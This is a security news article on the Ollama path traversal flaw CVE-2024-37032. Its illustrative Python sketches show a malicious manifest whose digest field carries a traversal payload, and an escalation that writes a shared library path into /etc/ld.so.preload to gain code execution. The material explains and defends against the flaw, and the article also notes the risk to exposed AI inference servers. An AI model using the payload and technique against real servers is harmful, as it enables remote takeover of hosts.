A vulnerability dubbed Probllama has been discovered and fixed in the code of the open source AI platform Ollama. The issue could be exploited for remote code execution.
The vulnerability, tracked as CVE-2024-37032 and dubbed Probllama, was found by Wiz specialists. The researchers reported the bug to the developers on May 5, 2024, and the problem was fixed in version 0.1.34, released on May 7, 2024.
Ollama is a popular tool for packaging, deploying, and running large language models (LLMs) locally on Windows, Linux, and macOS devices.
According to the researchers, the vulnerability stemmed from insufficient input validation leading to path traversal: an attacker could overwrite arbitrary files on the server, which ultimately allowed remote code execution.
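The bug class can be illustrated with a short sketch. This is not Ollama's actual code (the project is written in Go); the directory path, function names, and digest format check below are assumptions used only to show how an unvalidated digest turns into a traversal primitive, and how strict validation closes it:

```python
import os
import re

# Hypothetical blob storage directory, for illustration only.
BLOBS_DIR = "/root/.ollama/models/blobs"

def blob_path_unsafe(digest: str) -> str:
    # Vulnerable pattern: an attacker-controlled digest is joined into a
    # filesystem path without validation, so a value such as
    # "../../../../etc/ld.so.preload" escapes the blobs directory.
    return os.path.normpath(os.path.join(BLOBS_DIR, digest))

DIGEST_RE = re.compile(r"sha256:[0-9a-f]{64}")

def blob_path_safe(digest: str) -> str:
    # Fixed pattern: accept only well-formed sha256 digests, which by
    # construction contain no path separators or ".." sequences.
    if not DIGEST_RE.fullmatch(digest):
        raise ValueError(f"invalid digest: {digest!r}")
    return os.path.join(BLOBS_DIR, digest)

print(blob_path_unsafe("../../../../etc/ld.so.preload"))  # -> /etc/ld.so.preload
```

With the unsafe variant, the traversal payload resolves to a path entirely outside the storage directory; the safe variant rejects it before any path is built.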
To successfully exploit the bug, the attacker needed to send specially prepared HTTP requests to the Ollama API server. Specifically, the vulnerability exploited the /api/pull API endpoint (used to pull models from an official registry or private repository) to pass a malicious manifest file containing a path traversal payload in the digest field.
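A malicious manifest of the kind described might look as follows. The field names mirror a typical OCI-style manifest, but the exact schema shown here is an assumption for illustration, not Ollama's verbatim format:

```python
import json

# Illustrative manifest served by an attacker-controlled registry.
# The schema below is an assumption modeled on OCI-style manifests.
malicious_manifest = {
    "schemaVersion": 2,
    "layers": [
        {
            "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
            # Path traversal payload: instead of a "sha256:<hex>" value,
            # the digest field carries relative path components that
            # escape the server's blob storage directory.
            "digest": "../../../../etc/ld.so.preload",
            "size": 32,
        }
    ],
}

print(json.dumps(malicious_manifest, indent=2))
```

The victim server would then be induced to fetch this manifest, for example via a `POST /api/pull` request naming a model hosted on the attacker's registry.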
It is noted that the problem could be used not only to corrupt arbitrary files on the system, but also to achieve remote code execution: by overwriting the configuration file /etc/ld.so.preload, which is read by the dynamic linker (ld.so), an attacker can register a malicious shared library that is then loaded before any program executes.
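The escalation step described above boils down to two file writes through the traversal primitive. The specific paths below are hypothetical; the point is the sequence, not the values:

```python
# Sketch of the two-step escalation. Paths are illustrative; the
# capability being abused is the traversal-based arbitrary file write.
writes = [
    # Step 1: drop a malicious shared library somewhere on disk.
    ("/tmp/evil.so", b"<compiled shared object with a constructor>"),
    # Step 2: point the dynamic linker's preload list at it. ld.so reads
    # /etc/ld.so.preload and loads every library listed there into each
    # new dynamically linked process, running the library's initializer
    # before the program's own code.
    ("/etc/ld.so.preload", b"/tmp/evil.so\n"),
]

for target, contents in writes:
    print(f"write {len(contents)} bytes -> {target}")
```

After the second write, any dynamically linked binary started on the host pulls in the attacker's library, turning the file write into code execution.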
And while in standard Linux installations the risk of remote code execution is reduced because the API server is bound to localhost, in Docker installations, where the API server is publicly exposed, the situation is far more serious.
“This issue is extremely dangerous in Docker installations because the server runs with root privileges and listens on 0.0.0.0 by default, allowing this vulnerability to be exploited remotely,” the experts wrote.
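The difference between the two bind addresses is easy to demonstrate. The minimal sketch below (not Ollama code) binds two sockets: one reachable only from the local host, the other on every network interface, which is what makes the Docker default remotely exploitable:

```python
import socket

# A socket bound to 127.0.0.1 accepts connections only from the same
# host; one bound to 0.0.0.0 listens on all interfaces and is reachable
# from outside. Port 0 lets the OS pick a free port for this demo.
local_only = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_only.bind(("127.0.0.1", 0))
exposed = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exposed.bind(("0.0.0.0", 0))

local_addr = local_only.getsockname()[0]   # '127.0.0.1'
exposed_addr = exposed.getsockname()[0]    # '0.0.0.0'
print(local_addr, exposed_addr)

local_only.close()
exposed.close()
```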
The situation is aggravated by Ollama's lack of built-in authentication, which allows attackers to use a publicly accessible server to steal or modify AI models and to compromise self-hosted AI inference servers.
Wiz analysts warn that they have already identified more than 1,000 vulnerable Ollama instances hosting numerous AI models without any protection.
“CVE-2024-37032 is an easily exploitable RCE that affects modern AI infrastructure. Although the code base is relatively new and written in modern programming languages, classic vulnerabilities, such as path traversal, still remain relevant,” the experts conclude.